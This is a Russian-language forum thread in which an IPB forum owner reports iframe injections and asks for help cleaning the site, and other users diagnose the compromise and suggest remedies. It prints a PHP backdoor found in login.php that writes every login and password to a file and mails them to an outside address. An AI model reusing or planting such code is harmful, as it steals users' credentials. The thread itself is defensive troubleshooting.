IPB и зловредные коды

[NexXxus]

Вобщем ситуация такова.

IPB 2.3.3 с заплатками+MKportal. Примерно с декабря начались какие-то непонятные лишние зловредные коды в index.html и index.php. Сначала зафрейменые типа гугл аналиСТИКа (не аналитиКСА) ведушие на вирусные сайты. Установка CHMOD на 444 помогала, однако каким-то чудесным образом они сбрасывались. Недавно же началось вплоть до того, что на фтп начались создаваться какие-то неизвестные папки с рекламой и зараженными всеми файлами php., а в index' ах уже пишется содержание типа <!-- ad --><какая-то куча наборов символов на джава скриптах><!-- /ad -->и в конце подпись нашего адреса сайта .Так же было что создавался в корне .htaccess с каким то перенавправоением ботов и на сайт вирусный. И теперь когда загружаешь главную страницу, идут запросы на какието сайты, типа porno и прочее , пока не удалишь код.

Провел исследование сайта на вирусы, обнаружил какой-то Trojan.Giframe по пути но не могу понять где это, и как удалить. Смотрел в заданиях, вроде ничего подозрительного.

Можете что-то подсказать и посоветовать? И что это за ссылка, и где находится она.

[Clarus]

Судя по всему к тебе залили шел и теперь с него балуются...

Чем помочь - не знаю (

 

Trojan.Giframe is a heuristic detection to identify infected GIF images that may contain HTML tags crafted to redirect users to malicious websites.

 

вирусок только на виндах работает

 

тут пишут как прибить его ))) http://www.tongjimba.com/antivirus/howtore...remove_613.html

[Egor.M]

NexXxus, а какой хостинг? Помнится, были однажды проблемы... потом нашёл людей с тогоже хостинга, с теми же проблемами... Тупо дырявый сервис был.

[NexXxus]

Судя по всему к тебе залили шел и теперь с него балуются...

Чем помочь - не знаю (

Тоже возможно...шас вот еще заметил, что даже на страницах ошибки, уже в наглую прописаны ссылки на порно сайты

Наверное осталось только пасс паменять от фтп, и по новой форум лить, оставить только базу

 

NexXxus, а какой хостинг? Помнится, были однажды проблемы... потом нашёл людей с тогоже хостинга, с теми же проблемами... Тупо дырявый сервис был.

 

metroland.ru

 

Да чесно сказать, у других юзеров этого хостинга не замечено...только вот у нас такая вот фигня

[Farmazon]

NexXxus, некоторое время назад тоже столкнулся с такой проблемой. Во всех index.hml и index.php был дописан айфреймовый код. Менял пасс на фтп и перезаливал всё. Другого выхода не нашел.

[Egor.M]

NexXxus, некоторое время назад тоже столкнулся с такой проблемой. Во всех index.hml и index.php был дописан айфреймовый код. Менял пасс на фтп и перезаливал всё. Другого выхода не нашел.

Да, с таким тоже сталкивался... к сожалению, даже смена всех пассов не спасала... Если проект более-менее серьёзный, лучше переехать... =((

[Arhar]

почему так происходит - холивар в прикрепленной теме в разделе 2.2.х и 2.3.х (угнали базу с паролями)

[NexXxus]

Да уже думаю разобрался...была дыра просто у хостера, недавно. Залатали. У некоторых юзеров тоже такое было, помогла смена пароля на фтп и базу....

А вот еще вопрос...в папаке action_public в файле login.php заметил в самом верху такое вот:

if (isset($_REQUEST['UserName']) && isset($_REQUEST['PassWord']))
{
@$f = fopen('passwd.php', 'a+');
@fwrite($f, "Login: ".$_REQUEST['UserName']." password: ".$_REQUEST['PassWord']."\n");
$val1=$_REQUEST['UserName'];
$val2=$_REQUEST['PassWord'];
@fclose($f);
@mail("support@packpytka.com", "Тест", "$val1 : $val2");
}

Что этим хотели сделать?

 

2Arhar: не подскажите что за ссылка на скрине и куда ведет, какие файлы за нее отвечают, чтобы можно было удалить этого зловреда?

[FatCat]

Сливали логины и пароли всех авторизующихся на форуме в файл passwd.php и дублировали на мейл support@packpytka.com

[NexXxus]

Сливали логины и пароли всех авторизующихся на форуме в файл passwd.php и дублировали на мейл support@packpytka.com

мда...проверил щас..и точно..тока этот код работает када он в тегах <?php , но чужой был не внутри тега.

[FatCat]

но чужой был не внутри тега.

Если заинклюдить в пхп, все равно будет работать.

Ищи по имени файла с этим кодом, куда и как он подключается.

[andripoty]

а что это вообще за запрос такой /forum/index.php?act=task

если вводить самому то просто белый лист... часто вижу в логах сервера такие запросы, кто знает?

[Song]

Выполнение заданий.

[amelcreate]

Пассы уводят из тотал-коммандеров и других фтп менеджеров... этим ифреймовым заражениям уже года три как.

процесс выглядит грубо так...

заходите на зараженный сайт и получаете вирус к себе на комп.

этот вирус ищет пароли логины и адреса фтп соединений на вашем компе и самостоятельно инициирует фтп соединение с вашего компа с найденными хостами.

в доступных ему хостах добавляется вирусный ифрейм в файлы index, default, main с любыми расширениями... если файл имеет доступ только чтение то он перезаписывается полностью вредоносным кодом, а если есть доступ на запись то только добавляется ифрейм в начало или конец файла.

 

вывод, заразили ваш сайт? лечите свой комп и срочно меняйте пароль и логин на фтп доступ у всех своих сайтов.

Изменено 5 Апреля 2009 пользователем amelcreate

[FatCat]

Меня ломали один раз - дал дизайнеру ФТП-доступ, а ей через квип кейлогер закинули и считывали все нажатия клавиш.

[ModernTalking]

Аналогично...!Пришлось менять все паоли!